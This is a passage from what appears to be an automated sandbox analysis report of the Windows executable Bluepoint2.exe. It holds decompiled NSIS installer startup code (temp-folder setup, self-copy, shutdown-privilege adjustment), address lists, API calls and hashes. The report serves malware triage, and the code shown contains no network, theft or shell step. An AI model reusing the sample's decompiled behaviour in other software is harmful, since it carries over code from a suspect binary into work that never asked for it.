								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E0040360F(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403C25();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2f4 == _t189) {
														L77:
														_t120 =  *0x42a30c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E00406A35(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t189) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t265);
												goto L68;
											}
											_t219 = E00405F64(L"\"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe\" ") {
													_t190 = E00405C33(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x436800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", 0x436800);
														}
														E00406668(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe", 0x420f08, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E00406428(_t202, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t153 = E00405C4B(0x420f08);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E0040603F(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E00406668(0x436000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E0040360F(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E0040360F(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                                                                                                    0x0040364e
                                                                                                                                    0x0040364f
                                                                                                                                    0x00403656
                                                                                                                                    0x00403659
                                                                                                                                    0x00403660
                                                                                                                                    0x00403663
                                                                                                                                    0x00403676
                                                                                                                                    0x0040367c
                                                                                                                                    0x0040367f
                                                                                                                                    0x00403682
                                                                                                                                    0x00403690
                                                                                                                                    0x00403698
                                                                                                                                    0x004036a3
                                                                                                                                    0x004036bc
                                                                                                                                    0x004036be
                                                                                                                                    0x004036c6
                                                                                                                                    0x004036c6
                                                                                                                                    0x004036d1
                                                                                                                                    0x004036d3
                                                                                                                                    0x004036d3
                                                                                                                                    0x004036e8
                                                                                                                                    0x0040370d
                                                                                                                                    0x0040371b
                                                                                                                                    0x0040371e
                                                                                                                                    0x00403725
                                                                                                                                    0x0040372c
                                                                                                                                    0x0040372c
                                                                                                                                    0x00403725
                                                                                                                                    0x0040372e
                                                                                                                                    0x00403733
                                                                                                                                    0x00403734
                                                                                                                                    0x00403740
                                                                                                                                    0x00403744
                                                                                                                                    0x0040374b
                                                                                                                                    0x00403759
                                                                                                                                    0x0040375e
                                                                                                                                    0x00403765
                                                                                                                                    0x00403769
                                                                                                                                    0x0040376d
                                                                                                                                    0x0040376f
                                                                                                                                    0x0040376f
                                                                                                                                    0x0040376d
                                                                                                                                    0x00403776
                                                                                                                                    0x0040377d
                                                                                                                                    0x00403783
                                                                                                                                    0x0040379b
                                                                                                                                    0x004037ab
                                                                                                                                    0x004037b0
                                                                                                                                    0x004037b6
                                                                                                                                    0x004037bd
                                                                                                                                    0x004037c4
                                                                                                                                    0x004037c6
                                                                                                                                    0x004037c7
                                                                                                                                    0x004037d1
                                                                                                                                    0x004037d8
                                                                                                                                    0x004037da
                                                                                                                                    0x004037dc
                                                                                                                                    0x004037dc
                                                                                                                                    0x004037ef
                                                                                                                                    0x004037f1
                                                                                                                                    0x004038eb
                                                                                                                                    0x004038eb
                                                                                                                                    0x004038ee
                                                                                                                                    0x004038f1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004037fb
                                                                                                                                    0x004037fc
                                                                                                                                    0x004037ff
                                                                                                                                    0x00403808
                                                                                                                                    0x00403808
                                                                                                                                    0x0040380b
                                                                                                                                    0x0040380e
                                                                                                                                    0x00403811
                                                                                                                                    0x00403814
                                                                                                                                    0x00403814
                                                                                                                                    0x00403814
                                                                                                                                    0x00403815
                                                                                                                                    0x00403819
                                                                                                                                    0x004038d9
                                                                                                                                    0x004038e2
                                                                                                                                    0x004038e4
                                                                                                                                    0x004038e7
                                                                                                                                    0x004038ea
                                                                                                                                    0x004038ea
                                                                                                                                    0x004038ea
                                                                                                                                    0x00000000
                                                                                                                                    0x0040381f
                                                                                                                                    0x00403820
                                                                                                                                    0x00403821
                                                                                                                                    0x00403825
                                                                                                                                    0x0040383f
                                                                                                                                    0x00403846
                                                                                                                                    0x00403859
                                                                                                                                    0x0040385a
                                                                                                                                    0x0040386f
                                                                                                                                    0x00403874
                                                                                                                                    0x00403876
                                                                                                                                    0x00403878
                                                                                                                                    0x00403894
                                                                                                                                    0x0040389b
                                                                                                                                    0x004038ae
                                                                                                                                    0x004038af
                                                                                                                                    0x004038c4
                                                                                                                                    0x004038ca
                                                                                                                                    0x004038cc
                                                                                                                                    0x004038ce
                                                                                                                                    0x004038d6
                                                                                                                                    0x004038d8
                                                                                                                                    0x00000000
                                                                                                                                    0x004038d8
                                                                                                                                    0x004038d2
                                                                                                                                    0x004038d4
                                                                                                                                    0x004038f9
                                                                                                                                    0x004038fd
                                                                                                                                    0x00403906
                                                                                                                                    0x0040390b
                                                                                                                                    0x00403911
                                                                                                                                    0x0040391c
                                                                                                                                    0x0040391e
                                                                                                                                    0x00403923
                                                                                                                                    0x00403925
                                                                                                                                    0x0040397d
                                                                                                                                    0x00403982
                                                                                                                                    0x0040398b
                                                                                                                                    0x00403992
                                                                                                                                    0x00403995
                                                                                                                                    0x00403b6c
                                                                                                                                    0x00403b6c
                                                                                                                                    0x00403b71
                                                                                                                                    0x00403b7a
                                                                                                                                    0x00403b97
                                                                                                                                    0x00403c0f
                                                                                                                                    0x00403c0f
                                                                                                                                    0x00403c17
                                                                                                                                    0x00403c19
                                                                                                                                    0x00403c19
                                                                                                                                    0x00403c1f
                                                                                                                                    0x00403c1f
                                                                                                                                    0x00403bae
                                                                                                                                    0x00403bba
                                                                                                                                    0x00403bcb
                                                                                                                                    0x00403bd2
                                                                                                                                    0x00403bd9
                                                                                                                                    0x00403bd9
                                                                                                                                    0x00403be1
                                                                                                                                    0x00403bed
                                                                                                                                    0x00403bfb
                                                                                                                                    0x00403c06
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403bef
                                                                                                                                    0x00403bef
                                                                                                                                    0x00403bf0
                                                                                                                                    0x00403bf2
                                                                                                                                    0x00403bf3
                                                                                                                                    0x00403bf4
                                                                                                                                    0x00403bf9
                                                                                                                                    0x00403c08
                                                                                                                                    0x00403c0a
                                                                                                                                    0x00000000
                                                                                                                                    0x00403c0a
                                                                                                                                    0x00000000
                                                                                                                                    0x00403bf9
                                                                                                                                    0x00403bed
                                                                                                                                    0x00403b84
                                                                                                                                    0x00403b8b
                                                                                                                                    0x00403b8b
                                                                                                                                    0x004039a1
                                                                                                                                    0x00403a48
                                                                                                                                    0x00403a48
                                                                                                                                    0x00403a54
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a54
                                                                                                                                    0x004039b2
                                                                                                                                    0x004039ba
                                                                                                                                    0x00403a0c
                                                                                                                                    0x00403a0c
                                                                                                                                    0x00403a12
                                                                                                                                    0x00403a19
                                                                                                                                    0x00403a67
                                                                                                                                    0x00403a69
                                                                                                                                    0x00403a6e
                                                                                                                                    0x00403a70
                                                                                                                                    0x00403a78
                                                                                                                                    0x00403a78
                                                                                                                                    0x00403a83
                                                                                                                                    0x00403a8f
                                                                                                                                    0x00403a95
                                                                                                                                    0x00403a97
                                                                                                                                    0x00403b6a
                                                                                                                                    0x00403b6a
                                                                                                                                    0x00403b6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a9d
                                                                                                                                    0x00403a9d
                                                                                                                                    0x00403a9f
                                                                                                                                    0x00403aa0
                                                                                                                                    0x00403aa9
                                                                                                                                    0x00403aa2
                                                                                                                                    0x00403aa2
                                                                                                                                    0x00403aa2
                                                                                                                                    0x00403aaf
                                                                                                                                    0x00403ab7
                                                                                                                                    0x00403abe
                                                                                                                                    0x00403ac6
                                                                                                                                    0x00403ac6
                                                                                                                                    0x00403ad3
                                                                                                                                    0x00403adf
                                                                                                                                    0x00403ae9
                                                                                                                                    0x00403ae9
                                                                                                                                    0x00403aeb
                                                                                                                                    0x00403af2
                                                                                                                                    0x00403afc
                                                                                                                                    0x00403b08
                                                                                                                                    0x00403b0e
                                                                                                                                    0x00403b14
                                                                                                                                    0x00403b17
                                                                                                                                    0x00403b21
                                                                                                                                    0x00403b27
                                                                                                                                    0x00403b29
                                                                                                                                    0x00403b2d
                                                                                                                                    0x00403b3e
                                                                                                                                    0x00403b44
                                                                                                                                    0x00403b49
                                                                                                                                    0x00403b4b
                                                                                                                                    0x00403b4e
                                                                                                                                    0x00403b54
                                                                                                                                    0x00403b54
                                                                                                                                    0x00403b4b
                                                                                                                                    0x00403b29
                                                                                                                                    0x00403b57
                                                                                                                                    0x00403b5e
                                                                                                                                    0x00403b5e
                                                                                                                                    0x00403b5e
                                                                                                                                    0x00403b5e
                                                                                                                                    0x00403b65
                                                                                                                                    0x00000000
                                                                                                                                    0x00403b65
                                                                                                                                    0x00403a97
                                                                                                                                    0x00403a1b
                                                                                                                                    0x00403a1e
                                                                                                                                    0x00403a22
                                                                                                                                    0x00403a27
                                                                                                                                    0x00403a29
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a35
                                                                                                                                    0x00403a40
                                                                                                                                    0x00403a45
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a45
                                                                                                                                    0x004039c3
                                                                                                                                    0x004039db
                                                                                                                                    0x004039ec
                                                                                                                                    0x004039ed
                                                                                                                                    0x004039f1
                                                                                                                                    0x004039f3
                                                                                                                                    0x00403a01
                                                                                                                                    0x00403a08
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a08
                                                                                                                                    0x00403a0a
                                                                                                                                    0x00000000
                                                                                                                                    0x00403a0a
                                                                                                                                    0x0040392d
                                                                                                                                    0x00403939
                                                                                                                                    0x0040393e
                                                                                                                                    0x00403943
                                                                                                                                    0x00403945
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040394d
                                                                                                                                    0x00403955
                                                                                                                                    0x00403966
                                                                                                                                    0x0040396e
                                                                                                                                    0x00403970
                                                                                                                                    0x00403975
                                                                                                                                    0x00403977
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403977
                                                                                                                                    0x00000000
                                                                                                                                    0x004038d4
                                                                                                                                    0x0040387d
                                                                                                                                    0x0040387f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403881
                                                                                                                                    0x00403885
                                                                                                                                    0x00403889
                                                                                                                                    0x00403890
                                                                                                                                    0x00403890
                                                                                                                                    0x00403890
                                                                                                                                    0x00403890
                                                                                                                                    0x00000000
                                                                                                                                    0x00403890
                                                                                                                                    0x0040388b
                                                                                                                                    0x0040388e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040388e
                                                                                                                                    0x00403827
                                                                                                                                    0x0040382b
                                                                                                                                    0x0040382e
                                                                                                                                    0x00403835
                                                                                                                                    0x00403835
                                                                                                                                    0x00000000
                                                                                                                                    0x00403835
                                                                                                                                    0x00403830
                                                                                                                                    0x00403833
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403833
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403801
                                                                                                                                    0x00403801
                                                                                                                                    0x00403802
                                                                                                                                    0x00403803
                                                                                                                                    0x00403803
                                                                                                                                    0x00000000
                                                                                                                                    0x00403801
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                                                                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                                                                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                                                                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                                                                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Bluepoint2.exe" ,00000020,"C:\Users\user\Desktop\Bluepoint2.exe" ,00000000), ref: 004037E9
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                                                                      • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Bluepoint2.exe" ,00000000,?), ref: 00403A8F
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                                                                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\Bluepoint2.exe,00420F08,00000001), ref: 00403B21
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                                                                    • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Bluepoint2.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Bluepoint2.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                    • API String ID: 3859024572-128690259
                                                                                                                                    • Opcode ID: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
                                                                                                                                    • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                                                                    • Opcode Fuzzy Hash: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
                                                                                                                                    • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 713C1BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E713C1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E713C12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E713C12BB();
				_t321 = E713C12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E713C13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E713C162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
